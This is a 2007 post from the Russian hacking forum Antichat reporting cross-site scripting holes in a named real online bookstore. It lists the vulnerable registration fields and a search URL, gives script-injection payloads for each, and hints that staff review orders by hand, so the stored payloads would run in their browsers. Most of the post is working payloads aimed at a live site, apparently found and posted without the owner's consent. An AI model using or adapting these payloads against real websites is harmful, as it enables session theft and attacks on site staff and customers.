HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 26.04.2007, 09:11
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию
http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

При регистарации (
Код:
http://ismart.ee/Books.dll/login?next=index
)
уязвимы поля:
1. E-mail; - вписываем
Код:
qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
Код:
<script>alert(/xss/)</script>
Далее можно изменить приветствие на
Код:
<script>alert(/xss/)</script>
, тоже работает.

Все заказы просматриваются вручную кстати

И напоследок пассивная XSS, хотя это и не так интересно :
Код:
http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.